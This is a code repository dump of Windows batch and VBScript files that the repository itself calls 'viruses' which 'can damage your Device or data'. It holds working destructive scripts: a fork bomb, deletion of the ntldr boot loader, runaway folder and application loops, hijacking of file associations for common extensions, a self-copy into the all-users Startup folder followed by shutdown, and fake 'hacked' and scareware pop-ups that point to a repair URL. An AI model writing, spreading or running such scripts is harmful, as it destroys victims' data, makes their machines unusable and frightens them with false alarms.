├── Cpu.usage.increaser.bat ├── Shutdown.bat ├── reboot.remover.and.install.windows.again.bat ├── Automatic.folder.creator.bat ├── Notepad.Virus.bat ├── MATRIXCODE.BAT ├── Extension.changer.bat ├── README.md ├── Popup.Messenger.bat ├── Loop.messenger.vbs ├── Shutdown_at_Startup_for_all_users.Win_7_.and_XP.bat ├── crusher.bat ├── App.bomber.bat ├── messenger.bat ├── Matrix.cmd.code.runner.and.shutdowner.bat ├── message.virus.vbs └── Single.messenger.Unloop.vbs /Cpu.usage.increaser.bat: -------------------------------------------------------------------------------- 1 | %0|%0 -------------------------------------------------------------------------------- /Shutdown.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | cd\ 3 | shutdown -P 4 | 5 | 6 | -------------------------------------------------------------------------------- /reboot.remover.and.install.windows.again.bat: -------------------------------------------------------------------------------- 1 | attrib -s -r -h c:\ntldr 2 | del ntldr -------------------------------------------------------------------------------- /Automatic.folder.creator.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | :Rookie 3 | MD %RANDOM% 4 | goto Rookie -------------------------------------------------------------------------------- /Notepad.Virus.bat: -------------------------------------------------------------------------------- 1 | @ECHO off 2 | :top 3 | START %SystemRoot%\system32\notepad.exe 4 | GOTO top 5 | -------------------------------------------------------------------------------- /MATRIXCODE.BAT: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rohitcoder/Virus-Store---batch-and-vbs-based-virus/HEAD/MATRIXCODE.BAT -------------------------------------------------------------------------------- /Extension.changer.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | assoc.txt=myiris 3 | extension.txt 4 | assoc.jpeg=myiris 5 | assoc.png=myiris 6 | assoc.xls=myiris -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Virus-Store---batch-and-vbs-based-virus 2 | Please use it at your own risk. All Viruses here can damage your Device or data. 3 | -------------------------------------------------------------------------------- /Popup.Messenger.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | title Hacked... 3 | msg * Your computer has been hacked by Rookie and Now your fies are transferring to IP : 127.0.0.1 4 | -------------------------- 5 | -------------------------------------------------------------------------------- /Loop.messenger.vbs: -------------------------------------------------------------------------------- 1 | Set wshShell = wscript.CreateObject("WScript.Shell") 2 | do 3 | wscript.sleep 100 4 | wshshell.sendkeys ".You have been hacked !!! Your system is Cracking..." 5 | loop 6 | -------------------------------------------------------------------------------- /Shutdown_at_Startup_for_all_users.Win_7_.and_XP.bat: -------------------------------------------------------------------------------- 1 | copy Shutdown_at_Startup_for_all_users(Win_7_ and_XP).bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" 2 | copy Shutdown_at_Startup_for_all_users(Win_7_ and_XP).bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" 3 | Shutdown -s -t 05 4 | -------------------------------------------------------------------------------- /crusher.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | :daniel 3 | title hacking device... 4 | start %systemroot%\system32\notepad.exe 5 | start %systemroot%\system32\cmd.exe 6 | start %systemroot%\system32\control.exe 7 | start %systemroot%\system32\write.exe 8 | start %systemroot%\winhlp32.exe 9 | start %systemroot%\Boot\DVD\PCAT\etfsboot.com 10 | goto daniel 11 | 12 | 13 | -------------------------------------------------------------------------------- /App.bomber.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | :rookie 3 | start %systemroot%\system32\notepad.exe 4 | start %systemroot%\system32\cmd.exe 5 | start %systemroot%\system32\control.exe 6 | start %systemroot%\system32\write.exe 7 | start %systemroot%\winhlp32.exe 8 | start %systemroot%\Boot\DVD\PCAT\etfsboot.com 9 | start winword 10 | start cmd 11 | start powerpnt 12 | start pbrush 13 | start notepad 14 | goto rookie -------------------------------------------------------------------------------- /messenger.bat: -------------------------------------------------------------------------------- 1 | @title Chatter - Created By Rohit Kumar & color F2 2 | :A 3 | @Cls 4 | @echo off & break off & @setlocal enabledelayedexpansion 5 | @echo. 6 | @echo. 7 | @echo. 8 | @echo A Chatting Software by Rohit Kumar 9 | @echo. 10 | @echo. 11 | @echo. 12 | echo MESSENGER 13 | set /p n=User's IP address: 14 | set /p m=Type your Message: 15 | net send %n% %m% 16 | Pause 17 | Goto A -------------------------------------------------------------------------------- /Matrix.cmd.code.runner.and.shutdowner.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | title Hacking Your PC... 3 | help 4 | cd\ 5 | tree 6 | cls 7 | msg * System Corrupted Please change your OS within 3 days. 8 | msg * Setup.exe has been corrupted 9 | msg * Windows has encountered 12023 Errors and Vulnerabiliteis. 10 | msg * Message from PC : Please repair your computer or just go to www.myiris.tk/features/fixit.php 11 | cd\ 12 | shutdown -p 13 | -------------------------------------------------------------------------------- /message.virus.vbs: -------------------------------------------------------------------------------- 1 | WScript.Sleep 10000 2 | WScript.Sleep 10000 3 | Set WshShell = WScript.CreateObject("WScript.Shell") 4 | WshShell.Run "notepad" 5 | WScript.Sleep 100 6 | WshShell.AppActivate "Notepad" 7 | WScript.Sleep 500 8 | WshShell.SendKeys "Hel" 9 | WScript.Sleep 500 10 | WshShell.SendKeys "lo " 11 | WScript.Sleep 500 12 | WshShell.SendKeys ", You" 13 | WScript.Sleep 500 14 | WshShell.SendKeys "r S" 15 | WScript.Sleep 500 16 | WshShell.SendKeys "ystem" 17 | WScript.Sleep 500 18 | WshShell.SendKeys " is " 19 | WScript.Sleep 500 20 | WshShell.SendKeys " hacked" 21 | WScript.Sleep 500 22 | WshShell.SendKeys " your" 23 | WScript.Sleep 500 24 | WshShell.SendKeys " system" 25 | WScript.Sleep 500 26 | WshShell.SendKeys " is" 27 | WScript.Sleep 500 28 | WshShell.SendKeys " Cracking !!!" 29 | WScript.Sleep 500 30 | WshShell.SendKeys " 011111101010000010110101010101010101010000000101 " 31 | -------------------------------------------------------------------------------- /Single.messenger.Unloop.vbs: -------------------------------------------------------------------------------- 1 | WScript.Sleep 10000 2 | WScript.Sleep 10000 3 | Set WshShell = WScript.CreateObject("WScript.Shell") 4 | WshShell.Run "notepad" 5 | WScript.Sleep 100 6 | WshShell.AppActivate "Notepad" 7 | WScript.Sleep 500 8 | WshShell.SendKeys "Hel" 9 | WScript.Sleep 500 10 | WshShell.SendKeys "lo " 11 | WScript.Sleep 500 12 | WshShell.SendKeys ", You" 13 | WScript.Sleep 500 14 | WshShell.SendKeys "r S" 15 | WScript.Sleep 500 16 | WshShell.SendKeys "ystem" 17 | WScript.Sleep 500 18 | WshShell.SendKeys " is " 19 | WScript.Sleep 500 20 | WshShell.SendKeys " hacked" 21 | WScript.Sleep 500 22 | WshShell.SendKeys " your" 23 | WScript.Sleep 500 24 | WshShell.SendKeys " system" 25 | WScript.Sleep 500 26 | WshShell.SendKeys " is" 27 | WScript.Sleep 500 28 | WshShell.SendKeys " Cracking !!!" 29 | WScript.Sleep 500 30 | WshShell.SendKeys " 011111101010000010110101010101010101010000000101 " 31 | --------------------------------------------------------------------------------